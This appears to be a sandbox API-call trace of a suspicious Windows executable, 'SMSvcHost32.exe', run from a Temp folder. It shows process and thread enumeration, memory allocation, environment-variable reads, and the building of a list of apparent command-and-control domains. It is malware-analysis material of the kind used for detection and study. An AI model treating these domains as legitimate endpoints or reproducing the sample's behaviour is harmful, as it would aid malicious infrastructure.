	[0085.639] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xcf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe????????????????????????????????")) returned 0
	[0085.639] GetTickCount () returned 0x290bd
	[0085.640] Thread32First (hSnapshot=0x74c, lpte=0x203fa40) returned 1
	[0085.640] GetCurrentThreadId () returned 0x560
	[0085.640] Thread32Next (hSnapshot=0x74c, lpte=0x203fa40) returned 1
	[0085.641] GetTickCount () returned 0x290bd
	[0085.641] GetCurrentThreadId () returned 0x560
	[0085.641] Thread32Next (hSnapshot=0x74c, lpte=0x203fa40) returned 1
	[0085.642] GetTickCount () returned 0x290bd
	[0085.642] GetCurrentThreadId () returned 0x560
	[0085.642] Thread32Next (hSnapshot=0x74c, lpte=0x203fa40) returned 1
	[0085.643] GetTickCount () returned 0x290bd
	[0085.643] GetCurrentThreadId () returned 0x560
	[0085.643] Thread32Next (hSnapshot=0x74c, lpte=0x203fa40) returned 1
	[0085.643] GetTickCount () returned 0x290bd
	[0085.643] GetCurrentThreadId () returned 0x560
	[0085.643] Thread32Next (hSnapshot=0x74c, lpte=0x203fa40) returned 1
	[0085.644] GetTickCount () returned 0x290bd
	[0085.644] GetCurrentThreadId () returned 0x560
	[0085.644] Thread32Next (hSnapshot=0x74c, lpte=0x203fa40) returned 1
	[0085.645] GetTickCount () returned 0x290bd
	[0085.645] GetCurrentThreadId () returned 0x560
	[0085.645] Thread32Next (hSnapshot=0x74c, lpte=0x203fa40) returned 1
	[0085.646] GetTickCount () returned 0x290bd
	[0085.646] GetCurrentThreadId () returned 0x560
	[0085.646] Thread32Next (hSnapshot=0x74c, lpte=0x203fa40) returned 1
	[0085.647] GetTickCount () returned 0x290bd
	[0085.647] GetCurrentThreadId () returned 0x560
	[0085.647] Thread32Next (hSnapshot=0x74c, lpte=0x203fa40) returned 1
	[0085.647] GetTickCount () returned 0x290bd
	[0085.647] GetCurrentThreadId () returned 0x560
	[0085.647] Thread32Next (hSnapshot=0x74c, lpte=0x203fa40) returned 1
	[0085.648] GetTickCount () returned 0x290bd
	[0085.648] GetCurrentThreadId () returned 0x560
	[0085.648] Thread32Next (hSnapshot=0x74c, lpte=0x203fa40) returned 1
	[0085.649] GetTickCount () returned 0x290bd
	[0085.649] GetCurrentThreadId () returned 0x560
	[0085.649] Thread32Next (hSnapshot=0x74c, lpte=0x203fa40) returned 1
	[0085.650] GetTickCount () returned 0x290bd
	[0085.650] GetCurrentThreadId () returned 0x560
	[0085.650] Thread32Next (hSnapshot=0x74c, lpte=0x203fa40) returned 1
	[0085.650] GetTickCount () returned 0x290bd
	[0085.650] GetCurrentThreadId () returned 0x560
	[0085.650] Thread32Next (hSnapshot=0x74c, lpte=0x203fa40) returned 1
	[0085.651] GetTickCount () returned 0x290bd
	[0085.651] GetCurrentThreadId () returned 0x560
	[0085.651] Thread32Next (hSnapshot=0x74c, lpte=0x203fa40) returned 1
	[0085.712] GetTickCount () returned 0x290fb
	[0085.712] GetCurrentThreadId () returned 0x560
	[0085.712] Module32First (hSnapshot=0x74c, lpme=0x203f6d0) returned 1
	[0085.713] GetCurrentThreadId () returned 0x560
	[0085.713] Module32Next (hSnapshot=0x74c, lpme=0x203f6d0) returned 1
	[0085.714] GetTickCount () returned 0x290fb
	[0085.714] CloseHandle (hObject=0x74c) returned 1
	[0085.714] FreeLibrary (hLibModule=0x765a0000) returned 1
	[0085.714] QueryPerformanceCounter (in: lpPerformanceCount=0x203f638 | out: lpPerformanceCount=0x203f638*=1816822000000) returned 1
	[0085.714] GetCurrentThreadId () returned 0x560
	[0085.714] GlobalMemoryStatus (in: lpBuffer=0x203fa20 | out: lpBuffer=0x203fa20) 
	[0085.714] GetCurrentThreadId () returned 0x560
	[0085.714] GetCurrentProcessId () returned 0xdb8
	[0085.714] GetCurrentThreadId () returned 0x560
	[0085.714] VirtualAlloc (lpAddress=0x17700000, dwSize=0x2000000, flAllocationType=0x2000, flProtect=0x1) returned 0x17700000
	[0085.715] VirtualFree (lpAddress=0x17700000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0085.715] VirtualAlloc (lpAddress=0x18000000, dwSize=0x1000000, flAllocationType=0x2000, flProtect=0x1) returned 0x18000000
	[0085.731] SetLastError (dwErrCode=0x0) 
	[0085.731] GetLastError () returned 0x0
	[0085.731] SetLastError (dwErrCode=0x0) 
	[0085.731] GetLastError () returned 0x0
	[0085.731] SetLastError (dwErrCode=0x0) 
	[0085.731] SetLastError (dwErrCode=0x0) 
	[0085.731] GetLastError () returned 0x0
	[0085.731] SetLastError (dwErrCode=0x0) 
	[0085.731] GetLastError () returned 0x0
	[0085.731] SetLastError (dwErrCode=0x0) 
	[0085.732] SetLastError (dwErrCode=0x0) 
	[0085.732] GetLastError () returned 0x0
	[0085.732] SetLastError (dwErrCode=0x0) 
	[0085.732] GetLastError () returned 0x0
	[0085.732] SetLastError (dwErrCode=0x0) 
	[0085.732] SetLastError (dwErrCode=0x0) 
	[0085.732] GetLastError () returned 0x0
	[0085.732] SetLastError (dwErrCode=0x0) 
	[0085.732] GetLastError () returned 0x0
	[0085.732] SetLastError (dwErrCode=0x0) 
	[0085.732] SetLastError (dwErrCode=0x0) 
	[0085.732] GetLastError () returned 0x0
	[0085.732] SetLastError (dwErrCode=0x0) 
	[0085.732] GetLastError () returned 0x0
	[0085.732] SetLastError (dwErrCode=0x0) 
	[0085.732] SetLastError (dwErrCode=0x0) 
	[0085.732] GetLastError () returned 0x0
	[0085.732] SetLastError (dwErrCode=0x0) 
	[0085.732] GetLastError () returned 0x0
	[0085.732] SetLastError (dwErrCode=0x0) 
	[0085.733] SetLastError (dwErrCode=0x0) 
	[0085.733] GetLastError () returned 0x0
	[0085.733] SetLastError (dwErrCode=0x0) 
	[0085.733] GetLastError () returned 0x0
	[0085.733] SetLastError (dwErrCode=0x0) 
	[0085.735] GetSystemInfo (in: lpSystemInfo=0x203fbac | out: lpSystemInfo=0x203fbac*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0085.735] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x74c
	[0085.735] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x748
	[0085.735] SetLastError (dwErrCode=0x0) 
	[0085.735] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4d9d812, lpParameter=0x555278, dwCreationFlags=0x0, lpThreadId=0x55b444 | out: lpThreadId=0x55b444*=0xe60) returned 0x744
	[0085.735] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x750
	[0085.735] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x754
	[0085.735] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x758
	[0085.735] SetLastError (dwErrCode=0x0) 
	[0085.736] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4d9d812, lpParameter=0x3220aa8, dwCreationFlags=0x0, lpThreadId=0x55b494 | out: lpThreadId=0x55b494*=0xf70) returned 0x75c
	[0085.736] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x760
	[0085.736] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x764
	[0085.736] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x768
	[0085.736] SetLastError (dwErrCode=0x0) 
	[0085.736] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4d9d812, lpParameter=0x5b41e0, dwCreationFlags=0x0, lpThreadId=0x55b404 | out: lpThreadId=0x55b404*=0x3f8) returned 0x76c
	[0085.736] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x770
	[0085.736] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x774
	[0085.736] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x778
	[0085.736] SetLastError (dwErrCode=0x0) 
	[0085.737] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4d9d812, lpParameter=0x31a26b0, dwCreationFlags=0x0, lpThreadId=0x55b3a4 | out: lpThreadId=0x55b3a4*=0xa4) returned 0x77c
	[0085.737] timeGetTime () returned 0x2911a
	[0085.737] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203fb78 | out: lpSystemTimeAsFileTime=0x203fb78*(dwLowDateTime=0x64afe5b2, dwHighDateTime=0x1d492ec)) 
	[0085.737] timeGetTime () returned 0x2911a
	[0085.737] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203fb6c | out: lpSystemTimeAsFileTime=0x203fb6c*(dwLowDateTime=0x64afe5b2, dwHighDateTime=0x1d492ec)) 
	[0085.738] VirtualAlloc (lpAddress=0x14d00000, dwSize=0x120000, flAllocationType=0x2000, flProtect=0x1) returned 0x14d00000
	[0085.738] VirtualFree (lpAddress=0x14d00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0085.738] VirtualAlloc (lpAddress=0x14d00000, dwSize=0x11000, flAllocationType=0x2000, flProtect=0x1) returned 0x14d00000
	[0085.739] VirtualAlloc (lpAddress=0x14d00000, dwSize=0x11000, flAllocationType=0x1000, flProtect=0x4) returned 0x14d00000
	[0085.741] SetLastError (dwErrCode=0x0) 
	[0085.741] GetLastError () returned 0x0
	[0085.741] SetLastError (dwErrCode=0x0) 
	[0085.741] GetLastError () returned 0x0
	[0085.741] SetLastError (dwErrCode=0x0) 
	[0085.742] SetLastError (dwErrCode=0x0) 
	[0085.742] GetLastError () returned 0x0
	[0085.742] SetLastError (dwErrCode=0x0) 
	[0085.742] GetLastError () returned 0x0
	[0085.742] SetLastError (dwErrCode=0x0) 
	[0085.863] SetLastError (dwErrCode=0x0) 
	[0085.863] GetLastError () returned 0x0
	[0085.863] SetLastError (dwErrCode=0x0) 
	[0085.863] GetLastError () returned 0x0
	[0085.863] SetLastError (dwErrCode=0x0) 
	[0085.863] SetLastError (dwErrCode=0x0) 
	[0085.863] GetLastError () returned 0x0
	[0085.863] SetLastError (dwErrCode=0x0) 
	[0085.863] GetLastError () returned 0x0
	[0085.863] SetLastError (dwErrCode=0x0) 
	[0085.863] SetLastError (dwErrCode=0x0) 
	[0085.863] GetLastError () returned 0x0
	[0085.863] SetLastError (dwErrCode=0x0) 
	[0085.863] GetLastError () returned 0x0
	[0085.863] SetLastError (dwErrCode=0x0) 
	[0085.863] SetLastError (dwErrCode=0x0) 
	[0085.864] GetLastError () returned 0x0
	[0085.864] SetLastError (dwErrCode=0x0) 
	[0085.864] GetLastError () returned 0x0
	[0085.864] SetLastError (dwErrCode=0x0) 
	[0085.864] SetLastError (dwErrCode=0x0) 
	[0085.864] GetLastError () returned 0x0
	[0085.864] SetLastError (dwErrCode=0x0) 
	[0085.864] GetLastError () returned 0x0
	[0085.864] SetLastError (dwErrCode=0x0) 
	[0085.865] SetLastError (dwErrCode=0x0) 
	[0085.865] GetLastError () returned 0x0
	[0085.865] SetLastError (dwErrCode=0x0) 
	[0085.865] GetLastError () returned 0x0
	[0085.865] SetLastError (dwErrCode=0x0) 
	[0085.865] SetLastError (dwErrCode=0x0) 
	[0085.865] GetLastError () returned 0x0
	[0085.865] SetLastError (dwErrCode=0x0) 
	[0085.865] GetLastError () returned 0x0
	[0085.865] SetLastError (dwErrCode=0x0) 
	[0085.865] SetLastError (dwErrCode=0x0) 
	[0085.865] GetLastError () returned 0x0
	[0085.865] SetLastError (dwErrCode=0x0) 
	[0085.865] GetLastError () returned 0x0
	[0085.866] SetLastError (dwErrCode=0x0) 
	[0085.866] SetLastError (dwErrCode=0x0) 
	[0085.866] GetLastError () returned 0x0
	[0085.866] SetLastError (dwErrCode=0x0) 
	[0085.866] GetLastError () returned 0x0
	[0085.866] SetLastError (dwErrCode=0x0) 
	[0085.866] SetLastError (dwErrCode=0x0) 
	[0085.866] GetLastError () returned 0x0
	[0085.866] SetLastError (dwErrCode=0x0) 
	[0085.866] GetLastError () returned 0x0
	[0085.866] SetLastError (dwErrCode=0x0) 
	[0085.866] SetLastError (dwErrCode=0x0) 
	[0085.866] GetLastError () returned 0x0
	[0085.867] SetLastError (dwErrCode=0x0) 
	[0085.867] GetLastError () returned 0x0
	[0085.867] SetLastError (dwErrCode=0x0) 
	[0085.871] SetLastError (dwErrCode=0x0) 
	[0085.871] GetLastError () returned 0x0
	[0085.871] SetLastError (dwErrCode=0x0) 
	[0085.871] GetLastError () returned 0x0
	[0085.871] SetLastError (dwErrCode=0x0) 
	[0085.871] SetLastError (dwErrCode=0x0) 
	[0085.871] GetLastError () returned 0x0
	[0085.871] SetLastError (dwErrCode=0x0) 
	[0085.871] GetLastError () returned 0x0
	[0085.871] SetLastError (dwErrCode=0x0) 
	[0085.872] SetLastError (dwErrCode=0x0) 
	[0085.872] GetLastError () returned 0x0
	[0085.872] SetLastError (dwErrCode=0x0) 
	[0085.872] GetLastError () returned 0x0
	[0085.872] SetLastError (dwErrCode=0x0) 
	[0085.874] SetLastError (dwErrCode=0x0) 
	[0085.874] GetLastError () returned 0x0
	[0085.874] SetLastError (dwErrCode=0x0) 
	[0085.874] GetLastError () returned 0x0
	[0085.874] SetLastError (dwErrCode=0x0) 
	[0085.879] SetLastError (dwErrCode=0x0) 
	[0085.879] GetLastError () returned 0x0
	[0085.879] SetLastError (dwErrCode=0x0) 
	[0085.879] GetLastError () returned 0x0
	[0085.879] SetLastError (dwErrCode=0x0) 
	[0085.879] SetLastError (dwErrCode=0x0) 
	[0085.879] GetLastError () returned 0x0
	[0085.879] SetLastError (dwErrCode=0x0) 
	[0085.879] GetLastError () returned 0x0
	[0085.879] SetLastError (dwErrCode=0x0) 
	[0085.880] SetLastError (dwErrCode=0x0) 
	[0085.880] GetLastError () returned 0x0
	[0085.880] SetLastError (dwErrCode=0x0) 
	[0085.880] GetLastError () returned 0x0
	[0085.880] SetLastError (dwErrCode=0x0) 
	[0085.880] SetLastError (dwErrCode=0x0) 
	[0085.880] GetLastError () returned 0x0
	[0085.880] SetLastError (dwErrCode=0x0) 
	[0085.880] GetLastError () returned 0x0
	[0085.880] SetLastError (dwErrCode=0x0) 
	[0085.885] SetLastError (dwErrCode=0x0) 
	[0085.885] GetLastError () returned 0x0
	[0085.885] SetLastError (dwErrCode=0x0) 
	[0085.885] GetLastError () returned 0x0
	[0085.885] SetLastError (dwErrCode=0x0) 
	[0085.885] SetLastError (dwErrCode=0x0) 
	[0085.885] GetLastError () returned 0x0
	[0085.885] SetLastError (dwErrCode=0x0) 
	[0085.885] GetLastError () returned 0x0
	[0085.885] SetLastError (dwErrCode=0x0) 
	[0085.887] SetLastError (dwErrCode=0x0) 
	[0085.887] GetLastError () returned 0x0
	[0085.887] SetLastError (dwErrCode=0x0) 
	[0085.887] GetLastError () returned 0x0
	[0085.887] SetLastError (dwErrCode=0x0) 
	[0085.953] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x203fba4 | out: TokenHandle=0x203fba4*=0x780) returned 1
	[0085.953] GetTokenInformation (in: TokenHandle=0x780, TokenInformationClass=0xc, TokenInformation=0x203fba8, TokenInformationLength=0x4, ReturnLength=0x203fbb0 | out: TokenInformation=0x203fba8, ReturnLength=0x203fbb0) returned 1
	[0085.953] CloseHandle (hObject=0x780) returned 1
	[0085.953] GetCurrentProcessId () returned 0xdb8
	[0085.953] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x54d018, nSize=0x208 | out: lpFilename="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe")) returned 0x34
	[0085.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", cchWideChar=-1, lpMultiByteStr=0x328d228, cbMultiByte=520, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 53
	[0085.953] GetLastError () returned 0x0
	[0085.953] SetLastError (dwErrCode=0x0) 
	[0085.953] GetLastError () returned 0x0
	[0085.953] SetLastError (dwErrCode=0x0) 
	[0085.954] lstrlenA (lpString="") returned 0
	[0085.954] lstrcatA (in: lpString1="", lpString2="drk.fm604.com" | out: lpString1="drk.fm604.com") returned="drk.fm604.com"
	[0085.954] lstrlenA (lpString="drk.fm604.com") returned 13
	[0085.954] lstrcatA (in: lpString1="drk.fm604.com", lpString2="|" | out: lpString1="drk.fm604.com|") returned="drk.fm604.com|"
	[0085.954] lstrcatA (in: lpString1="drk.fm604.com|", lpString2="drk.fm604.com" | out: lpString1="drk.fm604.com|drk.fm604.com") returned="drk.fm604.com|drk.fm604.com"
	[0085.955] lstrlenA (lpString="drk.fm604.com|drk.fm604.com") returned 27
	[0085.955] lstrcatA (in: lpString1="drk.fm604.com|drk.fm604.com", lpString2="|" | out: lpString1="drk.fm604.com|drk.fm604.com|") returned="drk.fm604.com|drk.fm604.com|"
	[0085.955] lstrcatA (in: lpString1="drk.fm604.com|drk.fm604.com|", lpString2="it.sunballast.de" | out: lpString1="drk.fm604.com|drk.fm604.com|it.sunballast.de") returned="drk.fm604.com|drk.fm604.com|it.sunballast.de"
	[0085.955] lstrlenA (lpString="drk.fm604.com|drk.fm604.com|it.sunballast.de") returned 44
	[0085.955] lstrcatA (in: lpString1="drk.fm604.com|drk.fm604.com|it.sunballast.de", lpString2="|" | out: lpString1="drk.fm604.com|drk.fm604.com|it.sunballast.de|") returned="drk.fm604.com|drk.fm604.com|it.sunballast.de|"
	[0085.955] lstrcatA (in: lpString1="drk.fm604.com|drk.fm604.com|it.sunballast.de|", lpString2="gtdspr.space" | out: lpString1="drk.fm604.com|drk.fm604.com|it.sunballast.de|gtdspr.space") returned="drk.fm604.com|drk.fm604.com|it.sunballast.de|gtdspr.space"
	[0085.957] SetLastError (dwErrCode=0x0) 
	[0085.957] GetLastError () returned 0x0
	[0085.957] SetLastError (dwErrCode=0x0) 
	[0085.958] SetLastError (dwErrCode=0x0) 
	[0085.958] GetLastError () returned 0x0
	[0085.958] SetLastError (dwErrCode=0x0) 
	[0085.958] lstrcmpA (lpString1="natives", lpString2="constants") returned 1
	[0085.958] lstrcmpA (lpString1="natives", lpString2="natives") returned 0
	[0086.033] timeGetTime () returned 0x29241
	[0086.033] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203eea4 | out: lpSystemTimeAsFileTime=0x203eea4*(dwLowDateTime=0x64dcfbf9, dwHighDateTime=0x1d492ec)) 
	[0086.033] timeGetTime () returned 0x29241
	[0086.033] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203ee94 | out: lpSystemTimeAsFileTime=0x203ee94*(dwLowDateTime=0x64dcfbf9, dwHighDateTime=0x1d492ec)) 
	[0086.033] VirtualAlloc (lpAddress=0x18800000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x18800000
	[0086.035] VirtualAlloc (lpAddress=0x1e600000, dwSize=0x200000, flAllocationType=0x2000, flProtect=0x1) returned 0x1e600000
	[0086.035] VirtualFree (lpAddress=0x1e600000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0086.036] VirtualAlloc (lpAddress=0x1e600000, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1e600000
	[0086.036] VirtualAlloc (lpAddress=0x1e600000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x1e600000
	[0086.040] VirtualAlloc (lpAddress=0xcd01000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0xcd01000
	[0086.040] VirtualAlloc (lpAddress=0xcd02000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xcd02000
	[0086.042] timeGetTime () returned 0x2924b
	[0086.042] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203eea4 | out: lpSystemTimeAsFileTime=0x203eea4*(dwLowDateTime=0x64de726b, dwHighDateTime=0x1d492ec)) 
	[0086.042] timeGetTime () returned 0x2924b
	[0086.042] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203ee94 | out: lpSystemTimeAsFileTime=0x203ee94*(dwLowDateTime=0x64de726b, dwHighDateTime=0x1d492ec)) 
	[0086.042] timeGetTime () returned 0x2924b
	[0086.042] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203eea4 | out: lpSystemTimeAsFileTime=0x203eea4*(dwLowDateTime=0x64de726b, dwHighDateTime=0x1d492ec)) 
	[0086.042] timeGetTime () returned 0x2924b
	[0086.042] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203ee94 | out: lpSystemTimeAsFileTime=0x203ee94*(dwLowDateTime=0x64de726b, dwHighDateTime=0x1d492ec)) 
	[0086.095] timeGetTime () returned 0x2927f
	[0086.095] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203eef0 | out: lpSystemTimeAsFileTime=0x203eef0*(dwLowDateTime=0x64e672cc, dwHighDateTime=0x1d492ec)) 
	[0086.095] timeGetTime () returned 0x2927f
	[0086.095] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203eee0 | out: lpSystemTimeAsFileTime=0x203eee0*(dwLowDateTime=0x64e672cc, dwHighDateTime=0x1d492ec)) 
	[0086.099] VirtualAlloc (lpAddress=0x6400000, dwSize=0x200000, flAllocationType=0x2000, flProtect=0x1) returned 0x6400000
	[0086.099] VirtualFree (lpAddress=0x6400000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0086.099] VirtualAlloc (lpAddress=0x6400000, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x6400000
	[0086.099] VirtualAlloc (lpAddress=0x6400000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x6400000
	[0086.101] timeGetTime () returned 0x29286
	[0086.101] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203eef0 | out: lpSystemTimeAsFileTime=0x203eef0*(dwLowDateTime=0x64e7848c, dwHighDateTime=0x1d492ec)) 
	[0086.102] timeGetTime () returned 0x29286
	[0086.102] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203eee0 | out: lpSystemTimeAsFileTime=0x203eee0*(dwLowDateTime=0x64e7848c, dwHighDateTime=0x1d492ec)) 
	[0086.102] timeGetTime () returned 0x29286
	[0086.102] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203eef0 | out: lpSystemTimeAsFileTime=0x203eef0*(dwLowDateTime=0x64e7848c, dwHighDateTime=0x1d492ec)) 
	[0086.102] timeGetTime () returned 0x29286
	[0086.102] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203eee0 | out: lpSystemTimeAsFileTime=0x203eee0*(dwLowDateTime=0x64e7848c, dwHighDateTime=0x1d492ec)) 
	[0086.114] SetLastError (dwErrCode=0x0) 
	[0086.114] GetLastError () returned 0x0
	[0086.114] SetLastError (dwErrCode=0x0) 
	[0086.114] GetLastError () returned 0x0
	[0086.115] SetLastError (dwErrCode=0x0) 
	[0086.121] SetLastError (dwErrCode=0x0) 
	[0086.121] GetLastError () returned 0x0
	[0086.121] SetLastError (dwErrCode=0x0) 
	[0086.121] GetLastError () returned 0x0
	[0086.121] SetLastError (dwErrCode=0x0) 
	[0086.123] SetLastError (dwErrCode=0x0) 
	[0086.123] GetLastError () returned 0x0
	[0086.123] SetLastError (dwErrCode=0x0) 
	[0086.123] SetLastError (dwErrCode=0x0) 
	[0086.123] GetLastError () returned 0x0
	[0086.123] SetLastError (dwErrCode=0x0) 
	[0086.150] GetEnvironmentVariableW (in: lpName="NODE_CHANNEL_FD", lpBuffer=0x202f8b4, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0086.150] GetLastError () returned 0xcb
	[0086.150] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x203f350 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0086.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Nd9E1FYi\\Desktop", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26
	[0086.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Nd9E1FYi\\Desktop", cchWideChar=-1, lpMultiByteStr=0x203f574, cbMultiByte=1040, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\Nd9E1FYi\\Desktop", lpUsedDefaultChar=0x0) returned 26
	[0086.153] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x202f8cc, nSize=0x7fff | out: lpBuffer="Nd9E1FYi") returned 0x8
	[0086.153] GetEnvironmentVariableW (in: lpName="startupObject", lpBuffer=0x202f8cc, nSize=0x7fff | out: lpBuffer="Nd9E1FYi") returned 0x0
	[0086.153] GetLastError () returned 0xcb
	[0086.156] SetLastError (dwErrCode=0x0) 
	[0086.156] GetLastError () returned 0x0
	[0086.156] SetLastError (dwErrCode=0x0) 
	[0086.156] lstrcmpA (lpString1="constants", lpString2="constants") returned 0
	[0086.158] SetLastError (dwErrCode=0x0) 
	[0086.158] GetLastError () returned 0x0
	[0086.158] SetLastError (dwErrCode=0x0) 
	[0086.159] SetLastError (dwErrCode=0x0) 
	[0086.159] GetLastError () returned 0x0
	[0086.159] SetLastError (dwErrCode=0x0) 
	[0086.159] GetEnvironmentVariableW (in: lpName="NODE_HEAPDUMP_OPTIONS", lpBuffer=0x202f81c, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0086.159] GetLastError () returned 0xcb
	[0086.169] timeGetTime () returned 0x292c8
	[0086.169] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203ebdc | out: lpSystemTimeAsFileTime=0x203ebdc*(dwLowDateTime=0x64f19639, dwHighDateTime=0x1d492ec)) 
	[0086.169] timeGetTime () returned 0x292c8
	[0086.169] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203ebcc | out: lpSystemTimeAsFileTime=0x203ebcc*(dwLowDateTime=0x64f19639, dwHighDateTime=0x1d492ec)) 
	[0086.169] VirtualAlloc (lpAddress=0x18100000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x18100000
	[0086.170] VirtualAlloc (lpAddress=0x18900000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x18900000
	[0086.174] timeGetTime () returned 0x292c8
	[0086.174] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203ebdc | out: lpSystemTimeAsFileTime=0x203ebdc*(dwLowDateTime=0x64f19639, dwHighDateTime=0x1d492ec)) 
	[0086.174] timeGetTime () returned 0x292c8
	[0086.174] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203ebcc | out: lpSystemTimeAsFileTime=0x203ebcc*(dwLowDateTime=0x64f19639, dwHighDateTime=0x1d492ec)) 
	[0086.174] timeGetTime () returned 0x292c8
	[0086.174] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203ebdc | out: lpSystemTimeAsFileTime=0x203ebdc*(dwLowDateTime=0x64f19639, dwHighDateTime=0x1d492ec)) 
	[0086.174] timeGetTime () returned 0x292cf
	[0086.174] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203ebcc | out: lpSystemTimeAsFileTime=0x203ebcc*(dwLowDateTime=0x64f2a771, dwHighDateTime=0x1d492ec)) 
	[0086.175] SetLastError (dwErrCode=0x0) 
	[0086.176] GetLastError () returned 0x0
	[0086.176] SetLastError (dwErrCode=0x0) 
	[0086.176] GetEnvironmentVariableW (in: lpName="NODE_DEBUG", lpBuffer=0x202f59c, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0086.176] GetLastError () returned 0xcb
	[0086.178] QueryPerformanceFrequency (in: lpFrequency=0x203f514 | out: lpFrequency=0x203f514) returned 1
	[0086.178] ReleaseSemaphore (in: hSemaphore=0x748, lReleaseCount=1, lpPreviousCount=0x203f650 | out: lpPreviousCount=0x203f650) returned 1
	[0086.181] SetLastError (dwErrCode=0x0) 
	[0086.181] GetLastError () returned 0x0
	[0086.181] SetLastError (dwErrCode=0x0) 
